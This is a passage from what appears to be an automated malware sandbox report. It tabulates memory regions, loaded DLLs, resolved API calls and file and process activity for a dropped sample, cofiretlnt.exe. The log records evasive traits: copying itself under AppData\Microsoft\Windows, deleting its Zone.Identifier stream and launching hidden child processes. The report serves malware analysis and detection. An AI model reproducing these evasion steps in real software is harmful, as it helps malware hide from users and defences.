| rpcrtremote.dll | 0x75950000 | 0x7595dfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x75ac0000 | 0x75bf5fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75c60000 | 0x75cb6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x75cf0000 | 0x75e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75f20000 | 0x75f31fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x76040000 | 0x760c2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x76330000 | 0x7644cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x76530000 | 0x76574fff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x76580000 | 0x7671cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76720000 | 0x767aefff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x767e0000 | 0x769dafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76b00000 | 0x77749fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x77750000 | 0x77776fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x77800000 | 0x7780bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x77920000 | 0x77a14fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (51)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\TXCuQB4avHqPTPy.exe | desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | - | type = file_type |
|
39 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\TXCuQB4avHqPTPy.exe | type = size |
|
1 | |
| Get Info | C:\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\ | type = file_attributes |
|
1 | |
| Move | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\cofiretlnt.exe | source_filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\TXCuQB4avHqPTPy.exe |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\orangeneed.exe | - |
|
1 | |
| Delete | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\cofiretlnt.exe:Zone.Identifier | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\cofiretlnt.exe | os_pid = 0x90, show_window = SW_HIDE |
|
1 |
Module (37)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | ntdll.dll | base_address = 0x77e20000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x76a70000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x76220000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77820000 |
|
1 | |
| Get Handle | c:\users\aetadzjz\appdata\local\microsoft\windows\txcuqb4avhqptpy.exe | base_address = 0x400000 |
|
1 | |
| Get Address | - | function = GetBinaryTypeW, ordinal = 0, address_out = 0x18fe2c |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fd50 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fd80 |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x18fdd4 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x18fdd4 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = memcpy, address_out = 0x77e42340 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetStockObject, address_out = 0x76a84eb8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x762311f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount, address_out = 0x7623110c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x76231809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x762314e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77e4e026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x7624eceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x762314c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x76231700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x76235929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x762d6aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DefWindowProcA, address_out = 0x77e624e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfA, address_out = 0x7784ae5f |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = TranslateMessage, address_out = 0x77837809 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DispatchMessageA, address_out = 0x77837bbb |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetMessageA, address_out = 0x77837bd3 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadIconA, address_out = 0x7783dafb |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorA, address_out = 0x7783dad5 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSystemMetrics, address_out = 0x77837d2f |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadImageA, address_out = 0x77848455 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = RegisterClassExA, address_out = 0x7783db98 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = CreateWindowExA, address_out = 0x7783d22e |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = ShowWindow, address_out = 0x77840dfb |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = UpdateWindow, address_out = 0x77843559 |
|
1 | |
| Create Mapping | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\TXCuQB4avHqPTPy.exe | filename = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\TXCuQB4avHqPTPy.exe, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Map | C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\TXCuQB4avHqPTPy.exe | process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\txcuqb4avhqptpy.exe, desired_access = FILE_MAP_READ |
|
1 |
Service (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = LDWCN705BA84C, wndproc_parameter = 0 |
|
1 |
System (98)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Get Time | type = Ticks, time = 239586 |
|
57 | |
| Get Time | type = Ticks, time = 239601 |
|
29 | |
| Get Time | type = Ticks, time = 245966 |
|
5 | |
| Get Time | type = Ticks, time = 245982 |
|
3 | |
| Get Time | type = Ticks, time = 246075 |
|
1 | |
| Get Time | type = Ticks, time = 246965 |
|
2 |
Process #12: cofiretlnt.exe
159
0
| Information | Value |
|---|---|
| ID | #12 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\cofiretlnt.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\cofiretlnt.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:03:13, Reason: Child Process |
| Unmonitor | End Time: 00:03:15, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x90 |
| Parent PID | 0x660 (c:\users\aetadzjz\appdata\local\microsoft\windows\txcuqb4avhqptpy.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
88C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00032fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x00216fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000220000 | 0x00220000 | 0x00221fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x00247fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x00268fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x00308fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x00327fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| cofiretlnt.exey.exe | 0x00400000 | 0x0042dfff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000500000 | 0x00500000 | 0x005fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000600000 | 0x00600000 | 0x00787fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000790000 | 0x00790000 | 0x00910fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000920000 | 0x00920000 | 0x01d1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001d20000 | 0x01d20000 | 0x02112fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000021f0000 | 0x021f0000 | 0x021fffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x02200000 | 0x024cefff | Memory Mapped File | r |
|
|
|
- |
| winspool.drv | 0x74c40000 | 0x74c90fff | Memory Mapped File | rwx |
|
|
|
- |
| winmm.dll | 0x74ca0000 | 0x74cd1fff | Memory Mapped File | rwx |
|
|
|
- |
| msacm32.dll | 0x74ce0000 | 0x74cf3fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x75ac0000 | 0x75bf5fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75c60000 | 0x75cb6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x75cf0000 | 0x75e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75f20000 | 0x75f31fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x76330000 | 0x7644cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x76580000 | 0x7671cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76720000 | 0x767aefff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x767e0000 | 0x769dafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x77750000 | 0x77776fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x77800000 | 0x7780bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x77920000 | 0x77a14fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (39)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | - | type = file_type |
|
39 |
Module (34)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | ntdll.dll | base_address = 0x77e20000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x76a70000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x76220000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77820000 |
|
1 | |
| Get Address | - | function = GetBinaryTypeW, ordinal = 0, address_out = 0x18fe2c |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fd50 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x18fd80 |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x18fdd4 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x18fdd4 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = memcpy, address_out = 0x77e42340 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetStockObject, address_out = 0x76a84eb8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x762311f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount, address_out = 0x7623110c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x76231809 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x762314e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77e4e026 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x7624eceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x762314c9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x76231700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpW, address_out = 0x76235929 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeConsole, address_out = 0x762d6aa8 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DefWindowProcA, address_out = 0x77e624e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfA, address_out = 0x7784ae5f |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = TranslateMessage, address_out = 0x77837809 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DispatchMessageA, address_out = 0x77837bbb |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetMessageA, address_out = 0x77837bd3 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadIconA, address_out = 0x7783dafb |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorA, address_out = 0x7783dad5 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSystemMetrics, address_out = 0x77837d2f |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadImageA, address_out = 0x77848455 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = RegisterClassExA, address_out = 0x7783db98 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = CreateWindowExA, address_out = 0x7783d22e |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = ShowWindow, address_out = 0x77840dfb |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = UpdateWindow, address_out = 0x77843559 |
|
1 |
System (86)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = Ticks, time = 246231 |
|
11 | |
| Get Time | type = Ticks, time = 246247 |
|
66 | |
| Get Time | type = Ticks, time = 246263 |
|
9 |
Process #13: cofiretlnt.exe
458
4
| Information | Value |
|---|---|
| ID | #13 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\cofiretlnt.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\cofiretlnt.exe" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:03:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:34, Reason: Self Terminated |
| Monitor Duration | 00:00:20 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x890 |
| Parent PID | 0x90 (c:\users\aetadzjz\appdata\local\microsoft\windows\cofiretlnt.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A18
0x
7AC
0x
780
0x
7EC
0x
99C
0x
720
0x
184
0x
6BC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00032fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001d7fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x0025ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x00278fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x00298fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003b7fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| cofiretlnt.exey.exe | 0x00400000 | 0x0042dfff | Memory Mapped File | rwx |
|
|
|
- |
| locale.nls | 0x00430000 | 0x00496fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000004a0000 | 0x004a0000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004a0000 | 0x004a0000 | 0x004a0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000004b0000 | 0x004b0000 | 0x0052ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000530000 | 0x00530000 | 0x0053ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000530000 | 0x00530000 | 0x00537fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000530000 | 0x00530000 | 0x00531fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000580000 | 0x00580000 | 0x00587fff | Pagefile Backed Memory | rw |
|
|
|
- |
| windowsshell.manifest | 0x00580000 | 0x00580fff | Memory Mapped File | r |
|
|
|
- |
| index.dat | 0x00580000 | 0x0058bfff | Memory Mapped File | rw |
|
|
|
- |
| pagefile_0x0000000000590000 | 0x00590000 | 0x00591fff | Pagefile Backed Memory | r |
|
|
|
- |
| index.dat | 0x005a0000 | 0x005a7fff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x005b0000 | 0x005bffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x005c0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005c0000 | 0x005c0000 | 0x005c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x005dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005e0000 | 0x005e0000 | 0x00767fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000770000 | 0x00770000 | 0x008f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000900000 | 0x00900000 | 0x01cfffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001d00000 | 0x01d00000 | 0x020f2fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002100000 | 0x02100000 | 0x021defff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000021e0000 | 0x021e0000 | 0x0221ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002220000 | 0x02220000 | 0x0225ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002260000 | 0x02260000 | 0x0229ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000022a0000 | 0x022a0000 | 0x022affff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x022b0000 | 0x0257efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002580000 | 0x02580000 | 0x0267ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002680000 | 0x02680000 | 0x0277ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002780000 | 0x02780000 | 0x0286ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002780000 | 0x02780000 | 0x0279ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002780000 | 0x02780000 | 0x02780fff | Pagefile Backed Memory | r |
|
|
|
